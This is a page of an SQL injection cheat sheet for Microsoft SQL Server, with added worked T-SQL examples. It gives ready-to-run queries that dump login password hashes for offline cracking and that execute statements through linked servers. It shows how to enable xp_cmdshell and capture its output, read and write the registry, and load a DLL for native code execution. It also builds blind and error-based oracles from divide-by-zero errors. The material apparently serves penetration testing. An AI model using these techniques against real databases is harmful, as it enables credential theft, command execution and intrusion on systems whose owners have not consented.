SQL Injection Cheat Sheet, Page 10


Linked Servers
master..sysservers (2005+ also exposes the same data through sys.servers)
Password hashes (SQL Server 2000 and 2005 both store crackable hashes and use very similar formats: a 0x0100 header, a 4-byte salt and a SHA-1 of the UCS-2 password plus salt; 2000 additionally appends a second SHA-1 of the upper-cased password, which makes its hashes easier to crack)
SQL Server 2000:
master..sysxlogins (password column; sysadmin required)
SQL Server 2005:
sys.sql_logins (password_hash column; CONTROL SERVER permission required)
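As an added example that is not part of the original cheat sheet, the queries below enumerate linked servers, run a statement through one, and pull login hashes on SQL Server 2000 and 2005+. [LINKEDSRV] is a placeholder name; the hash queries need sysadmin (2000) or CONTROL SERVER (2005+), and master.dbo.fn_varbintohexstr is used only to render the binary hash as 0x... text for offline cracking.

```sql
-- Added example, not from the original cheat sheet. [LINKEDSRV] is a placeholder.

-- 1. Linked servers. master..sysservers works on 2000 and is kept as a
--    compatibility view later; rpcout/dataaccess tell you which of the two
--    execution methods below will work.
SELECT srvname, datasource, providername, rpcout, dataaccess
FROM master..sysservers;

-- 2. Execute on the linked server. Whose privileges this runs under depends on
--    the login mapping the DBA configured for the link (often a fixed, highly
--    privileged account).
EXEC ('SELECT @@servername, SYSTEM_USER') AT [LINKEDSRV];   -- needs rpcout = 1
SELECT * FROM OPENQUERY([LINKEDSRV], 'SELECT @@servername, SYSTEM_USER'); -- needs dataaccess = 1

-- 3. Login hashes for offline cracking.
--    SQL Server 2000: master..sysxlogins.password
SELECT name, master.dbo.fn_varbintohexstr(password) AS pwdhash
FROM master..sysxlogins
WHERE password IS NOT NULL;

--    SQL Server 2005 and later: sys.sql_logins.password_hash
SELECT name, master.dbo.fn_varbintohexstr(password_hash) AS pwdhash
FROM sys.sql_logins;
```

The 0x0100-prefixed strings returned by the hash queries are what password-cracking tools expect; a 2000 hash is 20 bytes longer than a 2005 hash because of the extra upper-cased SHA-1.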
More Stored Procedures for SQL Server (S)
1. Cmd Execute (xp_cmdshell; disabled by default from SQL Server 2005 on and must be re-enabled with sp_configure by a sysadmin)
exec master..xp_cmdshell 'dir'
2. Registry access (xp_regread and the other xp_reg* procedures)
1. xp_regaddmultistring
2. xp_regdeletekey
3. xp_regdeletevalue
4. xp_regenumkeys
5. xp_regenumvalues
6. xp_regread
7. xp_regremovemultistring
8. xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
3. Managing Services (xp_servicecontrol)
4. Medias (xp_availablemedia)
5. ODBC Resources (xp_enumdsn)
6. Login mode (xp_loginconfig)
7. Creating Cab Files (xp_makecab)
8. Domain Enumeration (xp_ntsec_enumdomains)
9. Process Killing (need PID) (xp_terminate_process)
10. Register a new extended stored procedure from a DLL (the DLL is loaded into the SQL Server process, so this is arbitrary native code execution; sysadmin only, and the DLL must already exist at a path the server can read)
sp_addextendedproc 'xp_webserver', 'c:\temp\x.dll'
exec xp_webserver
11. Write a text file to a UNC or a local path (sp_makewebtask; a legacy Web Assistant procedure, absent from modern versions)
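An added example, not from the original cheat sheet, that combines the procedures listed above: checking and enabling xp_cmdshell on SQL Server 2005+, capturing its output into a temp table so it can be read back through the injection point, and reading a registry value into a variable with xp_regread. It assumes sysadmin rights; the ProductName value under Windows NT\CurrentVersion is simply a well-known REG_SZ chosen for the demonstration, not a key from the page.

```sql
-- Added example, not from the original cheat sheet. Assumes sysadmin on 2005+.

-- xp_cmdshell is off by default from SQL Server 2005 onward: check, then enable.
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Capture command output in a temp table instead of depending on the result
-- set reaching the injection point; rows can then be pulled one at a time.
CREATE TABLE #out (line NVARCHAR(4000));
INSERT INTO #out EXEC master..xp_cmdshell 'whoami';
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;

-- xp_regread with an OUTPUT parameter: the value lands in a variable that can
-- be used in a WHERE clause or concatenated into an error message.
DECLARE @val NVARCHAR(4000);
EXEC master..xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion',
    @value_name = 'ProductName',   -- assumed REG_SZ value for the demo
    @value      = @val OUTPUT;
SELECT @val AS product_name;

-- Without OUTPUT the value comes back as a result set, as on this page.
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE',
    'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters',
    'nullsessionshares';
```

Enabling xp_cmdshell changes a server-wide setting that shows up in sys.configurations and in the default trace, so on an engagement record that you did it and restore the original value afterwards.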
MSSQL Bulk Notes
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ -- every connected session; uncomment the WHERE to see only your own
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe'; IF (@result = 0) SELECT 0 ELSE SELECT 1/0 -- xp_cmdshell returns 0 on success, non-zero on failure; the divide by zero turns that into an error-based yes/no oracle
HOST_NAME() -- workstation name reported by the connecting client (client-controlled, so not a trust anchor)
IS_MEMBER('group_or_role') -- 1 if the current user is in the given Windows group or database role, 0 if not, NULL if it does not exist
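An added example, not from the original cheat sheet, that turns the return code of xp_cmdshell and the IS_MEMBER family into blind and error-based oracles. The statements are written as they would execute after the injection point, not as encoded payloads; the cmd.exe path is only a file that is assumed to exist on any Windows host.

```sql
-- Added example, not from the original cheat sheet.

-- Who are we, and where are we connecting from?
SELECT SYSTEM_USER AS login_name, USER_NAME() AS db_user,
       HOST_NAME() AS client_host, @@SERVERNAME AS server_name;

-- IS_MEMBER: 1 = member, 0 = not a member, NULL = no such group/role.
-- IS_SRVROLEMEMBER does the same for server roles such as sysadmin.
SELECT IS_MEMBER('db_owner') AS is_db_owner,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Error-based oracle: 1/0 raises "Divide by zero error encountered", so the
-- presence or absence of an error answers a yes/no question.
IF IS_SRVROLEMEMBER('sysadmin') = 1 SELECT 1/0 ELSE SELECT 1;

-- The same trick on xp_cmdshell: it returns 0 when the command succeeded and
-- non-zero otherwise, so a fully blind injection still learns whether the
-- file exists. Output is sent to nul so only the return code matters.
DECLARE @result INT;
EXEC @result = master..xp_cmdshell 'dir C:\Windows\System32\cmd.exe > nul';  -- assumed path
IF @result = 0 SELECT 1 ELSE SELECT 1/0;

-- Our own session among the connected ones.
SELECT spid, loginame, hostname, program_name
FROM master..sysprocesses
WHERE spid = @@SPID;
```

Each IF ... SELECT 1/0 line leaks exactly one bit, so in practice they are wrapped in a loop or script that asks a series of such questions and records which requests errored.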
